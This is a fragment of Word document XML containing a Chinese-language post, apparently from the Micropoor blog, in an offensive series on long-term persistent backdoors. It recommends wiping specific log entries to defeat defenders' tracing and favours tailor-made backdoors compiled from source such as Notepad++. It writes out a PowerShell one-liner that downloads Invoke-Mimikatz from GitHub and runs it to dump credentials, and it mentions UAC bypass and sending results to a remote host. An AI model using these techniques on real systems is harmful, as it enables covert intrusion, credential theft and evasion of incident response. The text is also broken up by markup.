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483.0pt;margin-top:728.400pt;width:6.0pt;height:6.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7" w:lineRule="auto"/>
        <w:ind w:left="1080" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>专注AP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>T攻击与防御</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="68" w:after="0" w:line="247" w:lineRule="auto"/>
        <w:ind w:left="1080" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="003783"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>https://micropoor.blog</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="003783"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>spot.com/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="357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前者的话：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从第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三季开始引入段子，让本枯燥的学术文章，也变得生动有趣。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9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>第二季的Demo遵循人性五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条来设计，回忆这其中五条：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1：攻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击方与防御方的本质是什么？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增加对方的时间成本，人力成本，资源成本（不限制于服务器资源），金钱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成本。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2：安全公司的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本质是什么？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盈利，最小投入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，最大产出。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3：安全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公司产品的本质是什么？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能适应大部分客户，适应市场化，并且适应大部分机器。（包括不限制于资源紧张，宽带不足等问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题的客户）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4：安全人员的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本质是什么？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赚钱，养家。买房，还房贷。导致，快速解决客户问题（无论暂时还是永久性解决），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以免投诉。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5：对接客户的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本质是什么？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对接客户也是某公司内安全工作的一员，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与概念4相同。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de3f29"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>6:线</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>索排查与反线索排查</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="371" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="334" w:lineRule="auto"/>
        <w:ind w:left="1080" w:right="1107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那么这个demo离可高级可持续性渗透后门还有一段距离，这里引入第六条“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>线索排查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”与“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>反线索排查</w:t>
      </w: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”，在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第二季的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demo中，它生成了一个</w:t>
      </w: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名为micropoor.txt的文件，如果经验丰富的安全人员可根据时间差来排查日记，demo的工作流</w:t>
      </w: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程大致是这样的，打开notepad++，生成micropoor.txt，写入内容，关闭文件流。根据线索</w:t>
      </w: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排查，定位到notepad++，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导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致权限失控。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0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在线索排查概念中，这里要引入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“ABC”类线索关联排查</w:t>
      </w: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，当防御者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在得到线索A，顺藤到B，最后排查到目标文件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7"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>C，根据五条中的第一条，demo要考虑如何删除指定日志内容，以及其他操作。来阻止ABC类线</w:t>
      </w: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索关联排查。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="78" w:after="0" w:line="251" w:lineRule="auto"/>
        <w:ind w:left="1405" w:right="0" w:firstLine="0"/>
      </w:pP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不要思维固死在这是一个nontepad++后门的文章，它是一个面向类后门，面向的是可掌握源码编译的类后门</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="11"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>。同样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331" w:lineRule="auto"/>
        <w:ind w:left="1080" w:right="910" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>不要把思维固定死在demo中的例子，针对不同版本的NT系统，完全引用“powershell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="14"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>IEX</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18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(New-Object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System.Net.WebClient).DownloadString('https://raw.githubusercont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ent.com/clymb3r/PowerShell/master/Invoke-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> 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Mimikatz/Invoke-Mimikatz.ps1');Invoke-Mimikatz”而关于bypass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="-28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>UAC，已经有成熟的源码。或发送至远程或是写在</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="1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本地的图片里，不要让知识，限制了后门的想象。这也正是第一季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所说的：一个优秀的Microdoor是量身目标制定且一般</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="7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不具备通用性的。是的，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>一</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>般不具备通用性。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336" w:lineRule="auto"/>
        <w:ind w:left="1080" w:right="1125" w:firstLine="325"/>
      </w:pP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观看目前文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章的一共有2类人，一类攻击方，一类防守方。假设一个场景，现在摆在你面前有一台笔记本，并且这台笔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记本有明确的后门，你的任务，排查后门。我想所有人都会排查注册表，服务，端口，进程等。因为这些具</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="13"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>备通用性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，也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同样具备</w:t>
      </w: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通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用性排查手段。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="7" w:after="0" w:line="341" w:lineRule="auto"/>
        <w:ind w:left="1080" w:right="1155" w:firstLine="325"/>
      </w:pP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临近文章结尾，第三次引用：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在后门的进化对抗中，rootkit也发生了变化，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最大的改变是它的系统层次结构发生了变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化。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>如果彻底理解了这段话。那</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>么就要引用王健X爸爸的一句话：先定个小目标，控它个1825天。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="274" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="251" w:lineRule="auto"/>
        <w:ind w:left="1080" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/*</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="78" w:after="0" w:line="251" w:lineRule="auto"/>
        <w:ind w:left="1080" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>段子</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="78" w:after="0" w:line="251" w:lineRule="auto"/>
        <w:ind w:left="1080" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>*/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奈何厂商不重视后渗透攻击与持久性攻击，文章的结尾引用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>马X爸爸的一句话：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="68" w:after="0" w:line="251" w:lineRule="auto"/>
        <w:ind w:left="1080" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>厂商不改变，我</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>们就改变厂商。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spacing w:before="0" w:after="0" w:line="247" w:lineRule="auto"/>
        <w:ind w:left="10031" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Micropo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>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